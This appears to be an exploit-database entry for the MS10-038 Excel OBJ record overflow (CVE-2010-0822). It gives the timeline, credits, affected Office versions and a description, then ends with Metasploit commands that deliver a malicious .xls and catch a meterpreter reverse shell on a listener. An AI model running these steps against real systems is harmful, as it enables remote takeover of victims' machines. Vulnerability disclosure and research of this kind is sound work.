Timeline :
Vulnerability discovered and reported to vendor by Nicolas Joly
Coordinated release of the vulnerability the 2010-06-08
First exploit provided by abysssec the 2010-09-24
Metasploit PoC provided the 2011-11-21
PoC provided by :
Nicolas Joly
Shahin Ramezany
juan vazquez
Reference(s) :
CVE-2010-0822
OSVDB-65236
MS10-038
MOAUB #24
EBD-ID-15094
Affected version(s) :
Microsoft Office Excel 2002 Service Pack 3 and below
Microsoft Office Excel 2003 Service Pack 3 and below
Microsoft Office Excel 2007 Service Pack 1 and below
Microsoft Office Excel 2007 Service Pack 2
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Open XML File Format Converter for Mac
Microsoft Office Excel Viewer Service Pack 1 and below
Microsoft Office Excel Viewer Service Pack 2
Microsoft Office Compatibility Pack for Word, Excel
PowerPoint 2007 File Formats Service Pack 1
Microsoft Office Compatibility Pack for Word, Excel
PowerPoint 2007 File Formats Service Pack 2
Tested on Windows XP Pro SP3 with :
Microsoft Excel 2002 (10.2614.2625) SP0
Description :
This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP. By supplying a .xls file with a malformed OBJ (recType 0x5D) record an attacker can get the control of the execution flow. This results arbitrary code execution under the context of the user.
Commands :
use exploit/windows/fileformat/ms10_038_excel_obj_bof set TARGET 0 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.21 exploit use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.21 exploit -j getuid sysinfo